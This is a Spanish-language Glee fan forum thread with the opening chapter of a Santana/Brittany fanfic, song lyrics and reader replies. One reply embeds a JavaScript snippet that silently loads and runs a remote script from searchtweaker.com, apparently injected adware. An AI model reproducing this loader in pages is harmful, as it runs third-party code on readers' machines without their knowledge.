Gleek Latino
¿Quieres reaccionar a este mensaje? Regístrate en el foro con unos pocos clics o inicia sesión para continuar.
FanFic Brittana: "Your perfect eyes They're all I can see." Primer15
Image hosted by servimg.com

Image hosted by servimg.com
Image hosted by servimg.com
Estreno Glee 5x17
"Opening Night" en:
FanFic Brittana: "Your perfect eyes They're all I can see." Coment10
Últimos temas
» Ayudenme a encontrarlos
FanFic Brittana: "Your perfect eyes They're all I can see." EmptyLun Mar 14, 2022 3:20 pm por Laidy T

» Busco fanfic brittana
FanFic Brittana: "Your perfect eyes They're all I can see." EmptyLun Feb 28, 2022 10:01 pm por lana66

» Busco fanfic
FanFic Brittana: "Your perfect eyes They're all I can see." EmptySáb Nov 21, 2020 2:14 pm por LaChicken

» [Resuelto]Brittana: (Adaptación) El Oscuro Juego de SATANÁS... (Gp Santana) Cap. 7 Cont. Cap. 8
FanFic Brittana: "Your perfect eyes They're all I can see." EmptyJue Sep 17, 2020 12:07 am por gaby1604

» [Resuelto]FanFic Brittana: La Esposa del Vecino (Adaptada) Epílogo
FanFic Brittana: "Your perfect eyes They're all I can see." EmptyMar Sep 08, 2020 9:19 am por Isabella28

» Brittana: Destino o Accidente (GP Santana) Actualizado 17-07-2017
FanFic Brittana: "Your perfect eyes They're all I can see." EmptyDom Sep 06, 2020 10:27 am por Isabella28

» [Resuelto]Mándame al Infierno pero Besame (adaptación) Gp Santana Cap. 18 y Epilogo
FanFic Brittana: "Your perfect eyes They're all I can see." EmptyVie Sep 04, 2020 12:54 am por gaby1604

» Fic Brittana----Más aya de lo normal----(segunda parte)
FanFic Brittana: "Your perfect eyes They're all I can see." EmptyMar Ago 25, 2020 7:50 pm por atrizz1

» [Resuelto]FanFic Brittana: Wallbanger 3 Last Call (Adaptada) Epílogo
FanFic Brittana: "Your perfect eyes They're all I can see." EmptyLun Ago 03, 2020 5:10 pm por marthagr81@yahoo.es

» Que pasó con Naya?
FanFic Brittana: "Your perfect eyes They're all I can see." EmptyMiér Jul 22, 2020 6:54 pm por marthagr81@yahoo.es

» [Resuelto]FanFic Brittana: Medianoche V (Adaptada) Cap 31
FanFic Brittana: "Your perfect eyes They're all I can see." EmptyJue Jul 16, 2020 7:16 am por marthagr81@yahoo.es

» No abandonen
FanFic Brittana: "Your perfect eyes They're all I can see." EmptyMiér Jun 17, 2020 3:17 pm por Faith2303

» FanFic Brittana: " Glimpse " Epilogo
FanFic Brittana: "Your perfect eyes They're all I can see." EmptyVie Abr 17, 2020 12:26 am por Faith2303

» FanFic Brittana: Pídeme lo que Quieras 4: Y Yo te lo Daré (Adaptada) Epílogo
FanFic Brittana: "Your perfect eyes They're all I can see." EmptyLun Ene 20, 2020 1:47 pm por thalia danyeli

» Brittana, cafe para dos- Capitulo 16
FanFic Brittana: "Your perfect eyes They're all I can see." EmptyDom Oct 06, 2019 8:40 am por mystic

» brittana. amor y hierro capitulo 10
FanFic Brittana: "Your perfect eyes They're all I can see." EmptyMiér Sep 25, 2019 9:29 am por mystic

» holaaa,he vuelto
FanFic Brittana: "Your perfect eyes They're all I can see." EmptyJue Ago 08, 2019 4:33 am por monica.santander

» [Resuelto]FanFic Brittana: Wallbanger 3 Last Call (Adaptada) Epílogo
FanFic Brittana: "Your perfect eyes They're all I can see." EmptyMiér Mayo 08, 2019 9:25 pm por 23l1

» [Resuelto]FanFic Brittana: Comportamiento (Adaptada) Epílogo
FanFic Brittana: "Your perfect eyes They're all I can see." EmptyMiér Abr 10, 2019 9:29 pm por 23l1

» [Resuelto]FanFic Brittana: Justicia V (Adaptada) Epílogo
FanFic Brittana: "Your perfect eyes They're all I can see." EmptyLun Abr 08, 2019 8:29 pm por 23l1

FanFic Brittana: "Your perfect eyes They're all I can see." Encues10
Sondeo

Musical Favorito Glee 5x15 Bash

FanFic Brittana: "Your perfect eyes They're all I can see." Topeba1011%FanFic Brittana: "Your perfect eyes They're all I can see." Topeba10 11% [ 4 ]
FanFic Brittana: "Your perfect eyes They're all I can see." Topeba1019%FanFic Brittana: "Your perfect eyes They're all I can see." Topeba10 19% [ 7 ]
FanFic Brittana: "Your perfect eyes They're all I can see." Topeba1011%FanFic Brittana: "Your perfect eyes They're all I can see." Topeba10 11% [ 4 ]
FanFic Brittana: "Your perfect eyes They're all I can see." Topeba1024%FanFic Brittana: "Your perfect eyes They're all I can see." Topeba10 24% [ 9 ]
FanFic Brittana: "Your perfect eyes They're all I can see." Topeba1027%FanFic Brittana: "Your perfect eyes They're all I can see." Topeba10 27% [ 10 ]
FanFic Brittana: "Your perfect eyes They're all I can see." Topeba108%FanFic Brittana: "Your perfect eyes They're all I can see." Topeba10 8% [ 3 ]

Votos Totales : 37

Image hosted by servimg.com
FanFic Brittana: "Your perfect eyes They're all I can see." Gleeka10
Los posteadores más activos de la semana
No hay usuarios

Disclaimer
Image hosted by servimg.com
·Nombre: Gleek Latino
·Creación: 13 Nov 2009
·Host: Foroactivo
·Versión: GS5
Glee
Image hosted by servimg.com
Publicidad

FanFic Brittana: "Your perfect eyes They're all I can see."

+2
aria
CarmenSchafer
6 participantes

Ir abajo

Activo FanFic Brittana: "Your perfect eyes They're all I can see."

Mensaje por CarmenSchafer Mar Dic 25, 2012 4:02 am

Carta ....
No soy ningún artista como los que sueles escuchar, solo quiero decirte que a pesar de que a muchas personas las aburras con tus comentarios , gritos y escenas que haces hacia ellos … a mi me parece fascinante amo la sonrisa que ellos provocan en ti e incluso hasta esos bailes extraños que a veces haces al escuchar sus canciones … Me gustaría ser yo la que provoque todo eso en ti … ese simple “Te amo “ que le dices a una fotografía me rompe el corazón por que me doy cuenta de que jamás podre ser como ninguna de esas personas pero por lo menos yo podría darte el amor que ellos ignoran …. Y por eso esto es para ti ….

Santana
Al llegar al auditorio donde me habian dicho que alguien me esperaba estaba un poco nerviosa la verdad es que me pasaban mil preguntas en la mente principalmente ¿Quién me espera ? llegue a toda velocidad y al entrar me percate de que había una carta por el pasillo asi que me apresure a mirarla la cual decía “ABREME” al instante me decidi a verla no decía de quien era pero a pesar de eso comense a leerla al leer la primera palabra , me percate de que la había escrito alguien cercano a mi puesto que saben que me gusta la música , segui leyendo y no puede contenerme corrió una lagrima por mi mejilla seguida por otra, la verdad es que no podía creer lo hermosas que eran esas palabras…

Brittany
Estaba muy nerviosa la verdad es qué no se que estaba pensando ¿Por qué rayos pensé en hacer esto? Me arrepiento siento que me voy a morir pero ya lo hise y no puedo dar vuelta a la hoja, mientras estaba perdida en mis pensamientos escuche que alguien entraba al auditorio y entonces vi de reojo , “era ella la razón por la cual mi corazón se detenia , por la cual me costaba respirar , a la que yo había citado para por que por fin se diera cuenta de lo que siento por ella ahí estaba entrando y encontrando la carta que deje especialmente para ella , no podía evitar sentir como los nervios me carcomían pero lo hecho esta hecho no ?? asi que afrontarlo, de repente la vi soltar algunas lagrimas lo cual hiso que mi corazón se acelera y no pude evitar soltar unas cuantas lagrimas , en ese momento vi como ella empeso a buscar algo con la mirada y me di cuenta que era el momento de salir y expresarle lo que siento …

Santana
Acabo de leer la carta Tengo lagrimas en los ojos la verdad es que esta ,Muy hermosa no podía evitar llorar pero en el final decía que esto era para mi no entendí muy bien a que se referia, pero luego pensé obviamente a la carta y empece a buscar con la mirada alguien segui buscando por todo el auditorio cuando de repente escuche el sonido de una guitarra tocando una de mis canciones favoritas voltee rápidamente y ahí estaba : Mi amiga , la que siempre me había apoyado, con unas cuantas lagrimas en sus hermosos ojos color Azul celeste como el cielo , lo cual me dejo totalmente en schok no sabia que hacer solo estaba sorprendida no lo podía creer …

Brittany: y ahí con todo y mis nervios y algunas lagrimas rodando por mis mejillas comense a tocar y a Sali de donde estaba y empese a cantar :

https://www.youtube.com/watch?v=JO6knc7YHuc

I remember what you wore on the first day /Recuerdo lo que llevabas el primer dia
You came into my life and I thought / Entraste a mi vida y yo pense :
"Hey, you know, this could be something" /"Oye, tu sabes, esto podria ser algo"
'Cause everything you do and words you say / Porque todo lo que haces y cada palabra que dices
You know that it all takes my breath away / Tu sabes que todo eso me quita el aliento
And now I'm left with nothing / Y ahora me quedo sin nada
'Cause maybe it's true / Por que Talvez es verdad
That I can't live without you/ Que no puedo vivir sin ti
Maybe two is better than one / Talvez dos es mejor que uno
There's so much time /No hay mucho tiempo
To figure out the rest of my life / Para averiguar el resto de mi vida
And you thought that it got me coming undone/ Y tu pensabas que ya no estaba interesado


I remember every look upon your face 7 Recuerdo cada Mirada hacia tu cara
The way you roll your eyes/ La forma en la que mueves tus ojos
The way you taste / La forma en que lo notas
You make it hard for breathing/ Tu haces que respirar sea difícil
'Cause when I close my eyes and drift away / Por que cuando cierro los ojos y floto
I think of you and everything's okay / ´Pienso en ti y todo esta bien
I'm finally now believing / Y al final termino creyendo que

That maybe it's true / Que quizás es verdad
That I can't live without you/ Que no puedo vivir sin ti
Maybe two is better than one / Talvez dos es mejor que uno
Cause, baby, two is better than one/ por que cariño dos es mejor que uno
There's so much time/No hay mucho tiempo
To figure out the rest of my life/Para averiguar el resto de mi vida
But I'll figure it out/ Pero voy a averiguarlo
When it's all said and done/ Cuando todo este dicho y echo
Two is better than one/ Dos es mejor que uno

Santana: empece a escuchar atentamente la letra la verdad es que me la sabia perfectamente puesto que esa cancion me encantaba pero escucharla de una persona muy especial como lo era brittany para mi, era otra cosa diferente preste demasiada atencion a cada palabra a cada letra y fue como recordar todo y regresar al inicio cuando la vi por primera ves ....

Flashback año y medio atras ..



................................................................................................................................Hola bueno Me llamo Carmen y este es mi primer fic la verdad es que me encanta leer fics soy fan de todas las personas que escriben y tienen un tiempo para dedicarnos , bueno a base de leer muchos fics pues quise intentar hacer uno la verdad reconosco que no soy buena pero trate de hacer lo mejor FanFic Brittana: "Your perfect eyes They're all I can see." 918367557 espero que me digan la verdad si debo seguir o debo retirarme de esto y solo ser espectadora bueno Agradesco su tiempo y espero con todo gusto sus criticas y opiniones Muchas Gracias. FanFic Brittana: "Your perfect eyes They're all I can see." 2145353087


Última edición por CarmenSchafer el Mar Dic 25, 2012 1:14 pm, editado 1 vez
CarmenSchafer
CarmenSchafer
*
*

Femenino Mensajes : 36
Fecha de inscripción : 23/11/2012
Edad : 28
Club Brittana Alex


Volver arriba Ir abajo

Activo Re: FanFic Brittana: "Your perfect eyes They're all I can see."

Mensaje por aria Mar Dic 25, 2012 7:25 am

awwwwwwww FanFic Brittana: "Your perfect eyes They're all I can see." 2145353087 me ha encantadooooooooo

FanFic Brittana: "Your perfect eyes They're all I can see." 918367557 esa cancion es presiosa y definitivamente tienes que seguirlo



actualiza prontooooo
aria
aria
-
-

Femenino Mensajes : 1105
Fecha de inscripción : 03/12/2012
Club Naya/Santana Marissa


Volver arriba Ir abajo

Activo Re: FanFic Brittana: "Your perfect eyes They're all I can see."

Mensaje por _Claudia_100%fanGLEE_Bol Mar Dic 25, 2012 10:08 am

por supuesto que tienes FanFic Brittana: "Your perfect eyes They're all I can see." 650269930que continuar adelante con esta FanFic Brittana: "Your perfect eyes They're all I can see." 1770242605MAGNIFICA historia......en serio que me FanFic Brittana: "Your perfect eyes They're all I can see." 364988687encanto porque por lo regular quien empieza admitiendo la exitencia de sentimientos mas alla de la amistad es San, pero en tu historia es Britt, y es por eso precisamente que me gusto tu historia, espero que la continues porque aqui me tendras esperando FanFic Brittana: "Your perfect eyes They're all I can see." 3684740496ansiosa un nuevo capitulo

Saludos, hasta la proxima actualizacion FanFic Brittana: "Your perfect eyes They're all I can see." 2620582621
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="http://www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
_Claudia_100%fanGLEE_Bol
_Claudia_100%fanGLEE_Bol
-*
-*

Femenino Mensajes : 1976
Fecha de inscripción : 26/06/2012
Club Naya/Santana Alex


Volver arriba Ir abajo

Activo Re: FanFic Brittana: "Your perfect eyes They're all I can see."

Mensaje por isababela Mar Dic 25, 2012 10:16 pm

Si es por mi consentimiento, debes seguir adelante! es genial, este fic promete.... espero la actuu--
isababela
isababela
*******
*******

Femenino Mensajes : 470
Fecha de inscripción : 18/01/2012
Edad : 26
Club Brittana Marissa


Volver arriba Ir abajo

Activo Re: FanFic Brittana: "Your perfect eyes They're all I can see."

Mensaje por Mjmilawoman Sáb Dic 29, 2012 4:22 am

me gusta me gusta espero la actuuu :3 FanFic Brittana: "Your perfect eyes They're all I can see." 2145353087
Mjmilawoman
Mjmilawoman
*
*

Femenino Mensajes : 46
Fecha de inscripción : 23/09/2011
Edad : 26
Club Brittana Marissa


Volver arriba Ir abajo

Activo Re: FanFic Brittana: "Your perfect eyes They're all I can see."

Mensaje por Juliet st James Mar Jul 02, 2013 8:39 pm

Hola, debido a que este fic ya presenta mas de 6 meses sin actualización, se a procedido a cerrarlo, si el autor desea reabrirlo solo tiene que hacer una solicitud vía MP a un moderador, administradora y de inmediato el fan fic será reabierto
Juliet st James
Juliet st James
Nayaholic
Nayaholic

Mode FanFic
Femenino Mensajes : 1979
Fecha de inscripción : 31/05/2011
Edad : 30
Club Naya/Santana --


Volver arriba Ir abajo

Activo Re: FanFic Brittana: "Your perfect eyes They're all I can see."

Mensaje por Contenido patrocinado


Contenido patrocinado


Volver arriba Ir abajo

Volver arriba

- Temas similares

 
Permisos de este foro:
No puedes responder a temas en este foro.